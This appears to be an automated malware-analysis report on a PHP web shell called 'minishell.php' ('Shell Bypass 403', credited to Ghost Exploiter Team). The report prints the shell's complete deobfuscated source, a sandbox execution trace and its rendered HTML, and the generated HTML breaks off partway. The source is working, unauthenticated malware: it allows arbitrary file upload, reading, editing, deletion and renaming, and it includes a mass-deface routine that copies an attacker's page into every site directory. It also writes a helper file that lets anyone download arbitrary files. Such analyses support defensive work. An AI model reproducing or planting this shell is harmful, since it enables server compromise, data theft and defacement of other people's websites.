PHP Malware Analysis
minishell.php
md5: 79b040792073014da42ba6ae15097061
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
- file_get_contents (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original, Traces)
Title
- Shell Bypass 403 GE-C666C (Deobfuscated, HTML, Original)
URLs
- http://$dir/$nama (Original)
- https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->
<?php
$xNamashell = "b3p45.php";
//isi nama file mu
error_reporting(0);
@ob_clean();
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
} else {
$dir = getcwd();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Shell Bypass 403 GE-C666C</title>
</head>
<style>
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
font-family: monospace;
font-weight: 800;
}
body {
font-size: 120%;
color: #fff;
padding: 0;
margin: 25% 10% 10% 10%;
background-color: #111;
text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
margin: auto;
margin-bottom: 20px;
width: 96%;
}
table td {
transition: all .5s;
}
.data-table {
border-collapse: collapse;
font-size: 110%;
min-width: 600px;
}
.data-table th,
.data-table td {
border: none;
padding: 7px 15px;
width: 33%;
}
h3.title{
margin-bottom: 20px;
margin-top: 0px;
text-align: left;
background-color: #f00;
padding: 10px;
font-weight: 900;
font-size: 160%;
font-family: New Rocker;
}
.data-table tbody td {
color: #fff;
background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
text-align: left;
}
.data-table tbody td:first-child{
text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
background-color: #222;
}
.data-table tbody tr:hover td {
background-color: #151515;
border-color: #ccc;
}
.data-table tbody tr.stamp td {
color: #fff;
background-color: #000;
}
.data-table tbody tr.data td.nick {
color: #f00;
}
.kotak{
border: 2px solid #f00;
width: 100%;;
border-radius: 6px;
box-shadow: rgba(0,0,0,1) 3px 3px 5em;
padding-bottom: 10px;
}
.btn{
background-color: #f00;
border-radius: 5px;
border: 2px solid red;
width: 75px;
height: 27px;
font-size: 0.8em;
font-weight: 600;
color: #fff;
outline: none;
margin: 4px;
font-weight: 900;
padding: 2px 3px;
text-shadow: none;
}
.btn:hover{
box-shadow: 0px 0px 2px 2px darkred;
}
a{
color: #fff;
text-decoration: none;
}
a:hover{
color: #fff;
}
.nav_up{
margin: 2%;;
margin-top: 0px;
}
.stamp th{
font-size: 140%;
}
.dirname{
color: #f00;
}
.filename{
color: #fff;
}
input.btn.mini{
width: 35px;
height: 24px;
}
.dirnav{
margin-bottom: 20px;
}
.dirnav a{
color: lime;
}
textarea{
width: 95.5%;
height: 400px;
}
.balik{
margin-right: 200px;
}
.data-table th.det,
.data-table td.det{
width: 25%;
}
.fileinput{
width: 100px;
}
.new{
width: 160px;
}
.newf{
width: 90px;
}
.hide{
display: none;
}
.rmf{
margin-right: -5px;
}
.go{
background-color: green;
border: none;
}
.go:hover{
box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
text-align: right;
margin-top: -15px;
margin-right: 1%;
}
.massarea{
font-size: 60%;
margin: 2%;
}
.mass{
margin-left: 2%;
margin-top: 1%;
margin-right: 2%;
font-size: 60%;
}
.massresult{
margin-top: 8%;
font-size: 80%;
margin-left: 2%;
text-align: left;
}
.inputmass{
text-align: left;
}
.massbt{
font-size: 60%;
}
.massform{
margin-top: 6%;
}
.fbawah,.fatas{
display: inline-block;
}
</style>
<body>
<div class="kotak">
<h3 class="title">Ghost Exploiter Team Official</h3>
<div class="fitur">
<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
</div>
<div class="nav_up">
<?php
$dir = str_replace("\\", "/", $dir);
$dirs = explode("/", $dir);
foreach ($dirs as $key => $value) {
if ($value == "" && $key == 0) {
echo "<h3 class=\"dirnav\">Directory >> <a href=\"/\">/</a>";
continue;
}
echo "<a href=\"?dir=";
for ($i = 0; $i <= $key; $i++) {
echo "{$dirs[$i]}";
if ($key !== $i) {
echo "/";
}
}
echo '">' . $value . '</a>/';
}
echo "</h3>";
if (isset($_POST['upl'])) {
$namafile = $_FILES['upload']['name'];
$tempatfile = $_FILES['upload']['tmp_name'];
$tempat = $_GET['dir'];
$error = $_FILES['upload']['error'];
$ukuranfile = $_FILES['upload']['size'];
move_uploaded_file($tempatfile, $dir . '/' . $namafile);
echo "\n\t\t\t\t\t<script>alert('file terupload!');</script>\n\t\t\t\t\t";
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="upload">
<input type="submit" name="upl" value="Upload">
</form>
</div>
<center>
<!--Mass Deface-->
<?php
echo "\n\t<form method='post' class='hide massform' id='massform'>\n\t<font color='#f00' size='6px'>Mass Deface Auto Detect Domain</font><br><br><br>\n\t\t<div class='inputmass'>\n\t\t<input class='mass' type='text' name='pwd' size='50' value='{$dir}'><font color='silver' size='1px'>/*Ubah Ke document_root untuk mass deface*/</font><br>\n\t\t<input class='mass' type='text' name='namasc' size='50' placeholder='namafile.ext'><br>\n\t\t</div>\n\t\t<textarea name='scdeface' width='400px' placeholder='scdeface' class='massarea'></textarea>\n\t\t<input type='submit' name='massdef' value='Start' class='btn edt'><br>\n\t</form>";
?>
<!--Table-->
<table class="data-table" id="tabel">
<thead>
<tr class="stamp">
<th>File / Folder</th>
<th>Size</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td style="color: lime">.</td>
<td style="color: lime"><center>-</center></td>
<td><center>
<div id="divneww" style="display:none">
<form method="POST">
<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required/>
<select name="type">
<option disabled="disabled" selected="selected">type</option>
<option value="file">file</option>
<option value="dir">dir</option>
</select>
<input type="submit" value="Go" class="btn mini go" name="createnew"/>
</form>
</div>
<?php
echo "<div id=\"divnew\"><button class=\"btn newf\" onclick='display(\"divnew\",\"divneww\")'>+File/Dir</button></div>";
?>
</center>
</td>
</tr>
<?php
$scan = scandir($dir);
foreach ($scan as $directory) {
if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') {
continue;
}
echo '
<tr class="data">
<td class="det">
<a class="dirname" href="?dir=' . $dir . '/' . $directory . '">' . dirlimit($directory) . '</a>
</td>
<td style="color: red;"><center>--</center></td>
<td>
<center>';
echo '<form method="POST" id="' . clearspace($directory) . '_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="' . $directory . '" required/>
<input type="hidden" name="path" value="' . $dir . '">
<input type="hidden" name="oldname" value="' . $directory . '">
<input type="submit" value="Go" class="btn mini go"/>
</form>';
echo '<div id="' . clearspace($directory) . '_link">
<form method="post">
<input type="hidden" value="' . $dir . '/' . $directory . '" name="dirdl">
<input type="hidden" value="' . $dir . '" name="dirpath">
<input type="submit" value="del" name="rmdir" class="btn mini">';
echo '<a class="btn" href=\'javascript:display("' . clearspace($directory) . '_link","' . clearspace($directory) . '_form");\'>ren</a>';
echo "</form>\n\t</div>\n\t</center>\n\t</td>\n\t</tr>\n\t";
}
foreach ($scan as $file) {
if (!is_file($dir . '/' . $file)) {
continue;
}
$jumlah = filesize($dir . '/' . $file) / 1024;
$jumlah = round($jumlah, 3);
if ($jumlah >= 1024) {
$jumlah = round($jumlah / 1024, 2) . 'MB';
} else {
$jumlah .= 'KB';
}
echo '
<tr>
<td><a class="filename" href="?dir=' . $dir . '&open=' . $file . '">' . wordlimit($file) . '</a></td>
<td style="color: lime;"><center>' . $jumlah . '</center></td>
<td><center>';
echo '<form method="POST" id="' . clearfile($file) . '_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="' . $file . '" required/>
<input type="hidden" name="path" value="' . $dir . '">
<input type="hidden" name="oldname" value="' . $file . '">
<input type="submit" value="Go" class="btn mini go"/>
</form>';
echo '
<div id="' . clearfile($file) . '_link">
<form method="post" class="fatas">
<input type="hidden" value="' . $dir . '/' . $file . '" name="filedl">
<input type="hidden" value="' . $dir . '" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir=' . $dir . '&ubah=' . $file . '" class="btn">edt</a>';
echo '<a class="btn" href=\'javascript:display("' . clearfile($file) . '_link","' . clearfile($file) . '_form");\'>ren</a>';
echo '</form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="' . $dir . '" name="dlpath">
<input type="hidden" value="' . $file . '" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
';
}
echo "\n\t</tbody>\n\t</table>\n";
/*action*/
if (isset($_GET['open'])) {
echo '
<br />
<style>
table{
display: none;
}
</style>
<textarea>' . htmlspecialchars(file_get_contents($_GET['dir'] . '/' . $_GET['open'])) . '</textarea>
';
}
if (isset($_POST['rmfile'])) {
if (unlink($_POST['filedl'])) {
echo "<script>alert('Delete Ok !');window.location='?dir=" . $_POST['filepath'] . "';</script>";
}
}
if (isset($_POST['rmdir'])) {
$files = glob('' . $_POST['dirdl'] . '/*');
foreach ($files as $file) {
if (is_file($file)) {
unlink($file);
// hapus file
}
}
if (rmdir($_POST['dirdl'])) {
echo "<script>alert('Delete Ok !');window.location='?dir=" . $_POST['dirpath'] . "';</script>";
} else {
echo "<script>alert('err " . $_POST['dirdl'] . "!');</script>";
}
}
if (isset($_GET['ubah'])) {
if (isset($_POST['edit'])) {
$fp = fopen($_POST['object'], 'w');
if (fwrite($fp, $_POST['edit'])) {
echo "<script>alert('Edit Ok !');window.location='?dir=" . $_GET['dir'] . "';</script>";
} else {
err();
}
fclose($fp);
}
$hell = $_GET['dir'];
$yeah = $_GET['ubah'];
$patc = "{$hell}/{$yeah}";
echo '<style>
table {
display: none;
}
</style>
<form method="post" action="">
<input type="hidden" name="object" value="' . $patc . '">
<textarea name="edit">' . htmlspecialchars(file_get_contents($patc)) . '</textarea>
<a href="?dir=' . $dir . '" class="balik"><=Back</a>
<button type="submit" name="go" value="Submit" class="btn edt">Liking</button>
</form>
';
}
if (isset($_POST['newname'])) {
if (rename($_POST['path'] . '/' . $_POST['oldname'], $_POST['path'] . '/' . $_POST['newname'])) {
ok();
} else {
err();
}
}
if (isset($_POST['createnew']) && $_POST['createname'] != '') {
if ($_POST['type'] == 'file') {
$newfl = $dir . '/' . $_POST['createname'];
if (isset($newfl)) {
if (fopen($newfl, 'w')) {
ok();
} else {
err();
}
}
} elseif ($_POST['type'] == 'dir') {
$newdir = $dir . '/' . $_POST['createname'];
if (mkdir($newdir)) {
ok();
} else {
err();
}
} else {
echo "<script>alert('Pilih type !');</script>";
}
}
if (isset($_POST['massdef'])) {
echo "<style>\n\t\t\ttable {\n\t\t\t\tdisplay: none;\n\t\t\t}\n\t\t</style>";
$nama = $_POST['namasc'];
$sc = $_POST['scdeface'];
$bikin = fopen($nama, "w");
fwrite($bikin, $sc);
fclose($bikin);
$root = $_POST['pwd'];
$scan = scandir($root);
echo "<div class='massresult'>";
echo "<font color='lime'>[ DETECTED DOMAINS ] : </font><br><br><textarea>";
foreach ($scan as $a) {
$dir = $a;
$full = $root . '/' . $a . '/' . $nama;
$ekse = @copy($nama, $full);
if ($ekse) {
/*filtering dikit :v*/
if (preg_match('/[\\w]+[.]+[a-z]+/i', $dir, $match)) {
echo "http://{$dir}/{$nama}\n";
}
}
}
echo "\n\nNB : Kalo ada dir/domain yang gak terdetect isi sendiri yak :v\nPutra Gans tq</textarea>";
echo "</div>";
}
$fdlvalue = '<?php
$file_url = $_POST["dlpath"]."/".$_POST["dlname"];
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: utf-8");
header("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\"");
readfile($file_url);
?> ';
$dlwrite = fopen('fdl.php', 'w');
fwrite($dlwrite, $fdlvalue);
fclose($dlwrite);
/*function*/
function wordlimit($file, $limit = 26)
{
if (strlen($file) > $limit) {
$word = mb_substr($file, 0, $limit - 3) . "<font color=#f00>...</font>";
} else {
$word = $file;
}
return $word;
}
function dirlimit($directory, $limit = 22)
{
if (strlen($directory) > $limit) {
$dirlim = mb_substr($directory, 0, $limit - 3) . "<font color=#fff>...</font>";
} else {
$dirlim = $directory;
}
return $dirlim;
}
function ok()
{
echo "<script>alert('Berhasil !');window.location='';</script>";
}
function err()
{
echo "<script>alert('Gagal !');window.location='';</script>";
}
function clearspace($directory)
{
return str_replace(" ", "_", $directory);
}
function clearfile($file)
{
return str_replace(" ", "_", $file);
}
?>
<!--Logger-->
<script type="text/javExecution traces
data/traces/79b040792073014da42ba6ae15097061_trace-1676259828.2349.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:44:14.132716]
1 0 1 0.000145 393528
1 3 0 0.000469 454552 {main} 1 /var/www/html/uploads/minishell.php 0 0
1 A /var/www/html/uploads/minishell.php 6 $xNamashell = 'b3p45.php'
2 4 0 0.000503 454552 error_reporting 0 /var/www/html/uploads/minishell.php 8 1 0
2 4 1 0.000517 454592
2 4 R 22527
2 5 0 0.000531 454552 ob_clean 0 /var/www/html/uploads/minishell.php 9 0
2 5 1 0.000544 454552
2 5 R TRUE
2 6 0 0.000557 454552 getcwd 0 /var/www/html/uploads/minishell.php 14 0
2 6 1 0.000570 454600
2 6 R '/var/www/html/uploads'
1 A /var/www/html/uploads/minishell.php 14 $dir = '/var/www/html/uploads'
2 7 0 0.000597 454600 str_replace 0 /var/www/html/uploads/minishell.php 224 3 '\\' '/' '/var/www/html/uploads'
2 7 1 0.000613 454696
2 7 R '/var/www/html/uploads'
1 A /var/www/html/uploads/minishell.php 224 $dir = '/var/www/html/uploads'
2 8 0 0.000638 454600 explode 0 /var/www/html/uploads/minishell.php 225 2 '/' '/var/www/html/uploads'
2 8 1 0.000653 455176
2 8 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/minishell.php 225 $dirs = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/minishell.php 227 $key = 0
1 A /var/www/html/uploads/minishell.php 227 $key = 1
1 A /var/www/html/uploads/minishell.php 232 $i = 0
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 227 $key = 2
1 A /var/www/html/uploads/minishell.php 232 $i = 0
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 227 $key = 3
1 A /var/www/html/uploads/minishell.php 232 $i = 0
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 227 $key = 4
1 A /var/www/html/uploads/minishell.php 232 $i = 0
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
1 A /var/www/html/uploads/minishell.php 232 $i++
2 9 0 0.000889 455216 scandir 0 /var/www/html/uploads/minishell.php 303 1 '/var/www/html/uploads'
2 9 1 0.000922 455840
2 9 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'minishell.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/minishell.php 303 $scan = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'minishell.php', 5 => 'prepend.php']
2 10 0 0.000959 455856 is_dir 0 /var/www/html/uploads/minishell.php 306 1 '/var/www/html/uploads/.'
2 10 1 0.000975 455920
2 10 R TRUE
2 11 0 0.000989 455888 is_dir 0 /var/www/html/uploads/minishell.php 306 1 '/var/www/html/uploads/..'
2 11 1 0.001004 455936
2 11 R TRUE
2 12 0 0.001017 455896 is_dir 0 /var/www/html/uploads/minishell.php 306 1 '/var/www/html/uploads/.htaccess'
2 12 1 0.001032 455936
2 12 R FALSE
2 13 0 0.001045 455896 is_dir 0 /var/www/html/uploads/minishell.php 306 1 '/var/www/html/uploads/data'
2 13 1 0.001059 455936
2 13 R TRUE
2 14 0 0.001076 455968 dirlimit 1 /var/www/html/uploads/minishell.php 311 2 'data' ???
2 A /var/www/html/uploads/minishell.php 522 $dirlim = 'data'
2 14 1 0.001119 455968
2 14 R 'data'
2 15 0 0.001134 455840 clearspace 1 /var/www/html/uploads/minishell.php 316 1 'data'
3 16 0 0.001147 455840 str_replace 0 /var/www/html/uploads/minishell.php 532 3 ' ' '_' 'data'
3 16 1 0.001161 455936
3 16 R 'data'
2 15 1 0.001175 455840
2 15 R 'data'
2 17 0 0.001188 455840 clearspace 1 /var/www/html/uploads/minishell.php 322 1 'data'
3 18 0 0.001201 455840 str_replace 0 /var/www/html/uploads/minishell.php 532 3 ' ' '_' 'data'
3 18 1 0.001214 455936
3 18 R 'data'
2 17 1 0.001233 455840
2 17 R 'data'
2 19 0 0.001246 455840 clearspace 1 /var/www/html/uploads/minishell.php 327 1 'data'
3 20 0 0.001259 455840 str_replace 0 /var/www/html/uploads/minishell.php 532 3 ' ' '_' 'data'
3 20 1 0.001272 455936
3 20 R 'data'
2 19 1 0.001285 455840
2 19 R 'data'
2 21 0 0.001298 455920 clearspace 1 /var/www/html/uploads/minishell.php 327 1 'data'
3 22 0 0.001310 455920 str_replace 0 /var/www/html/uploads/minishell.php 532 3 ' ' '_' 'data'
3 22 1 0.001323 456016
3 22 R 'data'
2 21 1 0.001336 455920
2 21 R 'data'
2 23 0 0.001349 455904 is_dir 0 /var/www/html/uploads/minishell.php 306 1 '/var/www/html/uploads/minishell.php'
2 23 1 0.001365 455952
2 23 R FALSE
2 24 0 0.001378 455912 is_dir 0 /var/www/html/uploads/minishell.php 306 1 '/var/www/html/uploads/prepend.php'
2 24 1 0.001393 455952
2 24 R FALSE
2 25 0 0.001406 455896 is_file 0 /var/www/html/uploads/minishell.php 336 1 '/var/www/html/uploads/.'
2 25 1 0.001421 455920
2 25 R FALSE
2 26 0 0.001434 455888 is_file 0 /var/www/html/uploads/minishell.php 336 1 '/var/www/html/uploads/..'
2 26 1 0.001448 455936
2 26 R FALSE
2 27 0 0.001461 455896 is_file 0 /var/www/html/uploads/minishell.php 336 1 '/var/www/html/uploads/.htaccess'
2 27 1 0.001475 455936
2 27 R TRUE
2 28 0 0.001488 455896 filesize 0 /var/www/html/uploads/minishell.php 338 1 '/var/www/html/uploads/.htaccess'
2 28 1 0.001502 455936
2 28 R 64
1 A /var/www/html/uploads/minishell.php 338 $jumlah = 0.0625
2 29 0 0.001526 455840 round 0 /var/www/html/uploads/minishell.php 339 2 0.0625 3
2 29 1 0.001540 455912
2 29 R 0.063
1 A /var/www/html/uploads/minishell.php 339 $jumlah = 0.063
1 A /var/www/html/uploads/minishell.php 343 $jumlah = '0.063KB'
2 30 0 0.001575 455984 wordlimit 1 /var/www/html/uploads/minishell.php 348 2 '.htaccess' ???
2 A /var/www/html/uploads/minishell.php 515 $word = '.htaccess'
2 30 1 0.001599 455984
2 30 R '.htaccess'
2 31 0 0.001613 455872 clearfile 1 /var/www/html/uploads/minishell.php 351 1 '.htaccess'
3 32 0 0.001626 455872 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' '.htaccess'
3 32 1 0.001639 455968
3 32 R '.htaccess'
2 31 1 0.001653 455872
2 31 R '.htaccess'
2 33 0 0.001667 455872 clearfile 1 /var/www/html/uploads/minishell.php 358 1 '.htaccess'
3 34 0 0.001680 455872 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' '.htaccess'
3 34 1 0.001693 455968
3 34 R '.htaccess'
2 33 1 0.001707 455872
2 33 R '.htaccess'
2 35 0 0.001721 455872 clearfile 1 /var/www/html/uploads/minishell.php 364 1 '.htaccess'
3 36 0 0.001733 455872 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' '.htaccess'
3 36 1 0.001747 455968
3 36 R '.htaccess'
2 35 1 0.001760 455872
2 35 R '.htaccess'
2 37 0 0.001773 455968 clearfile 1 /var/www/html/uploads/minishell.php 364 1 '.htaccess'
3 38 0 0.001786 455968 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' '.htaccess'
3 38 1 0.001799 456064
3 38 R '.htaccess'
2 37 1 0.001812 455968
2 37 R '.htaccess'
2 39 0 0.001826 455928 is_file 0 /var/www/html/uploads/minishell.php 336 1 '/var/www/html/uploads/data'
2 39 1 0.001841 455968
2 39 R FALSE
2 40 0 0.001854 455936 is_file 0 /var/www/html/uploads/minishell.php 336 1 '/var/www/html/uploads/minishell.php'
2 40 1 0.001868 455984
2 40 R TRUE
2 41 0 0.001881 455944 filesize 0 /var/www/html/uploads/minishell.php 338 1 '/var/www/html/uploads/minishell.php'
2 41 1 0.001894 455984
2 41 R 12288
1 A /var/www/html/uploads/minishell.php 338 $jumlah = 12
2 42 0 0.001916 455848 round 0 /var/www/html/uploads/minishell.php 339 2 12 3
2 42 1 0.001929 455920
2 42 R 12
1 A /var/www/html/uploads/minishell.php 339 $jumlah = 12
1 A /var/www/html/uploads/minishell.php 343 $jumlah = '12KB'
2 43 0 0.001963 455992 wordlimit 1 /var/www/html/uploads/minishell.php 348 2 'minishell.php' ???
2 A /var/www/html/uploads/minishell.php 515 $word = 'minishell.php'
2 43 1 0.001991 455992
2 43 R 'minishell.php'
2 44 0 0.002005 455880 clearfile 1 /var/www/html/uploads/minishell.php 351 1 'minishell.php'
3 45 0 0.002018 455880 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'minishell.php'
3 45 1 0.002032 455976
3 45 R 'minishell.php'
2 44 1 0.002046 455880
2 44 R 'minishell.php'
2 46 0 0.002061 455880 clearfile 1 /var/www/html/uploads/minishell.php 358 1 'minishell.php'
3 47 0 0.002073 455880 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'minishell.php'
3 47 1 0.002087 455976
3 47 R 'minishell.php'
2 46 1 0.002101 455880
2 46 R 'minishell.php'
2 48 0 0.002114 455880 clearfile 1 /var/www/html/uploads/minishell.php 364 1 'minishell.php'
3 49 0 0.002126 455880 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'minishell.php'
3 49 1 0.002140 455976
3 49 R 'minishell.php'
2 48 1 0.002153 455880
2 48 R 'minishell.php'
2 50 0 0.002166 455976 clearfile 1 /var/www/html/uploads/minishell.php 364 1 'minishell.php'
3 51 0 0.002179 455976 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'minishell.php'
3 51 1 0.002192 456072
3 51 R 'minishell.php'
2 50 1 0.002205 455976
2 50 R 'minishell.php'
2 52 0 0.002219 455944 is_file 0 /var/www/html/uploads/minishell.php 336 1 '/var/www/html/uploads/prepend.php'
2 52 1 0.002234 455984
2 52 R TRUE
2 53 0 0.002247 455944 filesize 0 /var/www/html/uploads/minishell.php 338 1 '/var/www/html/uploads/prepend.php'
2 53 1 0.002260 455984
2 53 R 57
1 A /var/www/html/uploads/minishell.php 338 $jumlah = 0.0556640625
2 54 0 0.002284 455848 round 0 /var/www/html/uploads/minishell.php 339 2 0.0556640625 3
2 54 1 0.002297 455920
2 54 R 0.056
1 A /var/www/html/uploads/minishell.php 339 $jumlah = 0.056
1 A /var/www/html/uploads/minishell.php 343 $jumlah = '0.056KB'
2 55 0 0.002332 455992 wordlimit 1 /var/www/html/uploads/minishell.php 348 2 'prepend.php' ???
2 A /var/www/html/uploads/minishell.php 515 $word = 'prepend.php'
2 55 1 0.002355 455992
2 55 R 'prepend.php'
2 56 0 0.002370 455880 clearfile 1 /var/www/html/uploads/minishell.php 351 1 'prepend.php'
3 57 0 0.002383 455880 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'prepend.php'
3 57 1 0.002397 455976
3 57 R 'prepend.php'
2 56 1 0.002410 455880
2 56 R 'prepend.php'
2 58 0 0.002424 455880 clearfile 1 /var/www/html/uploads/minishell.php 358 1 'prepend.php'
3 59 0 0.002436 455880 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'prepend.php'
3 59 1 0.002450 455976
3 59 R 'prepend.php'
2 58 1 0.002464 455880
2 58 R 'prepend.php'
2 60 0 0.002598 455880 clearfile 1 /var/www/html/uploads/minishell.php 364 1 'prepend.php'
3 61 0 0.002612 455880 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'prepend.php'
3 61 1 0.002627 455976
3 61 R 'prepend.php'
2 60 1 0.002640 455880
2 60 R 'prepend.php'
2 62 0 0.002653 455976 clearfile 1 /var/www/html/uploads/minishell.php 364 1 'prepend.php'
3 63 0 0.002666 455976 str_replace 0 /var/www/html/uploads/minishell.php 535 3 ' ' '_' 'prepend.php'
3 63 1 0.002680 456072
3 63 R 'prepend.php'
2 62 1 0.002694 455976
2 62 R 'prepend.php'
1 A /var/www/html/uploads/minishell.php 500 $fdlvalue = '<?php \n$file_url = $_POST["dlpath"]."/".$_POST["dlname"]; \nheader("Content-Type: application/octet-stream"); \nheader("Content-Transfer-Encoding: utf-8"); \nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\""); \nreadfile($file_url); \n?> '
2 64 0 0.002732 455880 fopen 0 /var/www/html/uploads/minishell.php 507 2 'fdl.php' 'w'
2 64 1 0.002766 456512
2 64 R resource(5) of type (stream)
1 A /var/www/html/uploads/minishell.php 507 $dlwrite = resource(5) of type (stream)
2 65 0 0.002795 456440 fwrite 0 /var/www/html/uploads/minishell.php 508 2 resource(5) of type (stream) '<?php \n$file_url = $_POST["dlpath"]."/".$_POST["dlname"]; \nheader("Content-Type: application/octet-stream"); \nheader("Content-Transfer-Encoding: utf-8"); \nheader("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\""); \nreadfile($file_url); \n?> '
2 65 1 0.002826 456504
2 65 R 275
2 66 0 0.002842 456440 fclose 0 /var/www/html/uploads/minishell.php 509 1 resource(5) of type (stream)
2 66 1 0.002857 456048
2 66 R TRUE
1 3 1 0.002873 456016
0.002903 320936
TRACE END [2023-02-13 01:44:14.135503]
Generated HTML code
<html><head>
<title>Shell Bypass 403 GE-C666C</title>
<style>
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
font-family: monospace;
font-weight: 800;
}
body {
font-size: 120%;
color: #fff;
padding: 0;
margin: 25% 10% 10% 10%;
background-color: #111;
text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
margin: auto;
margin-bottom: 20px;
width: 96%;
}
table td {
transition: all .5s;
}
.data-table {
border-collapse: collapse;
font-size: 110%;
min-width: 600px;
}
.data-table th,
.data-table td {
border: none;
padding: 7px 15px;
width: 33%;
}
h3.title{
margin-bottom: 20px;
margin-top: 0px;
text-align: left;
background-color: #f00;
padding: 10px;
font-weight: 900;
font-size: 160%;
font-family: New Rocker;
}
.data-table tbody td {
color: #fff;
background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
text-align: left;
}
.data-table tbody td:first-child{
text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
background-color: #222;
}
.data-table tbody tr:hover td {
background-color: #151515;
border-color: #ccc;
}
.data-table tbody tr.stamp td {
color: #fff;
background-color: #000;
}
.data-table tbody tr.data td.nick {
color: #f00;
}
.kotak{
border: 2px solid #f00;
width: 100%;;
border-radius: 6px;
box-shadow: rgba(0,0,0,1) 3px 3px 5em;
padding-bottom: 10px;
}
.btn{
background-color: #f00;
border-radius: 5px;
border: 2px solid red;
width: 75px;
height: 27px;
font-size: 0.8em;
font-weight: 600;
color: #fff;
outline: none;
margin: 4px;
font-weight: 900;
padding: 2px 3px;
text-shadow: none;
}
.btn:hover{
box-shadow: 0px 0px 2px 2px darkred;
}
a{
color: #fff;
text-decoration: none;
}
a:hover{
color: #fff;
}
.nav_up{
margin: 2%;;
margin-top: 0px;
}
.stamp th{
font-size: 140%;
}
.dirname{
color: #f00;
}
.filename{
color: #fff;
}
input.btn.mini{
width: 35px;
height: 24px;
}
.dirnav{
margin-bottom: 20px;
}
.dirnav a{
color: lime;
}
textarea{
width: 95.5%;
height: 400px;
}
.balik{
margin-right: 200px;
}
.data-table th.det,
.data-table td.det{
width: 25%;
}
.fileinput{
width: 100px;
}
.new{
width: 160px;
}
.newf{
width: 90px;
}
.hide{
display: none;
}
.rmf{
margin-right: -5px;
}
.go{
background-color: green;
border: none;
}
.go:hover{
box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
text-align: right;
margin-top: -15px;
margin-right: 1%;
}
.massarea{
font-size: 60%;
margin: 2%;
}
.mass{
margin-left: 2%;
margin-top: 1%;
margin-right: 2%;
font-size: 60%;
}
.massresult{
margin-top: 8%;
font-size: 80%;
margin-left: 2%;
text-align: left;
}
.inputmass{
text-align: left;
}
.massbt{
font-size: 60%;
}
.massform{
margin-top: 6%;
}
.fbawah,.fatas{
display: inline-block;
}
</style></head>
<body>
<div class="kotak">
<h3 class="title">Ghost Exploiter Team Official</h3>
<div class="fitur">
<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
</div>
<div class="nav_up">
